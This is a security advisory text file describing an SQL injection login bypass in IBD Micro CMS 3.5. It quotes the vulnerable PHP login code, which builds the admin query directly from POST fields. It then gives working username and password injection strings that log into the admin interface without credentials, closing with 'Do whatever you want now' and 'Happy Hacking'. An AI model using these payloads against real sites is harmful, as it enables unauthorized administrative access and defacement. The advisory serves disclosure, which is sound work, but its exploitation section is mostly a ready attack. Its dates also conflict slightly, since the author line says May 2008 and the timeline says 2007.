ibdmicro-sql.txt

`____________________________________________________________________________  
____________________________________________________________________________  
  
01010111 01001001 01010010 01000101 01000100 01010011 ->  
01000101 01000011 01010101 01010010 01001001 01010100 ->  
01011001   
  
____________________________________________________________________________  
ADVISORY: IBD MICRO CMS 3.5 SQL INJECTION (LOGIN BYPASS)  
____________________________________________________________________________  
  
_____________________  
|| 0x00: ABOUT ME  
|| 0x01: DATELINE  
|| 0x02: INFORMATION  
|| 0x03: EXPLOITATION  
|| 0x04: RISK LEVEL  
  
____________________________________________________________  
____________________________________________________________  
  
_________________  
|| 0x00: ABOUT ME  
  
Author: SkyOut  
Date: May 2008  
Website: http://wired-security.net/  
  
_________________  
|| 0x01: DATELINE  
  
2007-05-09: Bug found  
2007-05-10: Advisory released  
  
____________________  
|| 0x02: INFORMATION  
  
The content management system Micro CMS in version 3.5 and maybe lower versions  
suffers from a SQL Injection bug, that makes it possible to log into the admin  
interface without knowing the credentials.  
  
First off, where can you find the tool:  
http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html  
  
Direct download:  
http://www.impliedbydesign.com/files/software_downloads/microcms/microcms.zip  
  
They have still taken down their demo site because of security issues. Seems they  
realized, that there are some bugs, but instead of fixing them, they just keep the tool  
online and free for download!  
  
To make this bug exploitable "magic_quotes_gpc" has to be turned "Off"!  
  
So let's look at the bug now...  
  
_____________________  
|| 0x03: EXPLOITATION  
  
When you download the file microcms.zip and extract it you have the following things your  
directory:  
  
Folder: micro_cms_files, microcms_subdirectory_example  
Files: microcms-admin-home.php, microcms-admin-login.php, microcms-index.php  
  
Let's look into the microcms-admin-login.php file:  
  
--- SNIP ---  
if ($_POST['action'] == 'admin_login') {  
$i = 0;  
if (!$_POST['administrators_username']) {  
$error[$i] = "Please enter your username.";  
$i++;  
}  
if (!$_POST['administrators_pass']) {  
$error[$i] = "Please enter a password.";  
$i++;  
}  
if ($i == 0) {  
--- SNIP ---  
  
Via the variable $i the tool checks if both, username and password, have been  
set, if so an if-clause gets opened and here we go:  
  
--- SNIP ---  
if ($i == 0) {  
$sql = '  
SELECT *  
FROM microcms_administrators  
WHERE administrators_username = "' . $_POST['administrators_username'] . '" and  
administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")';  
$user_result = mysql_query($sql);  
  
if (mysql_num_rows($user_result) < 1) {  
$error[$i] = "That username and password don't match, please try again.";  
$i++;  
} else {  
--- SNIP ---  
  
Here we have the SQL Injection. The query gets built in the variable $sql = '' and finally executed  
via mysql_query($sql);, the result gets saved in $user_result. If the value is less then 1 an error  
has occurred, if not...  
  
So what do we have to set for username (administrators_username) and password (administrators_pass)?  
  
Username is simple: Just input " or "1" = "1 ... this will make the query look right, but not for the  
password, it is a bit more tricky because of the PASSWORD(); function.  
Password will then be this: ") or "1" = "1" or PASSWORD("  
  
All in all we have:  
  
--- SNIP ---  
$sql = '  
SELECT *  
FROM microcms_administrators  
WHERE administrators_username = "" OR "1" = "1" and  
administrators_pass = PASSWORD("") or "1" = "1" or PASSWORD("")';  
---SNIP ---  
  
And finally we execute this and get the following:  
  
--- SNIP ---  
$admin = mysql_fetch_array($user_result);  
$_SESSION['microcms_admin_username'] = $admin['administrators_username'];  
$_SESSION['microcms_admin_password'] = $admin['administrators_pass'];  
$_SESSION['microcms_admin_email'] = $admin['administrators_email'];  
$_SESSION['microcms_admin_id'] = $admin['administrators_id'];  
$_SESSION['microcms_admin_level'] = $admin['administrators_level'];  
header("Location:microcms-admin-home.php");  
$main_content = '<h2>You have successfully logged in!</h2><p>You may now navigate to the \  
page whose content you would like to change.</p>';  
--- SNIP ---  
  
Alright, we are logged in! Hacked!  
Do whatever you want now...  
  
___________________  
|| 0x04: RISK LEVEL  
  
- HIGH - (3/3) -  
  
<!> Happy Hacking <!>  
  
____________________________________________________________________________  
____________________________________________________________________________  
`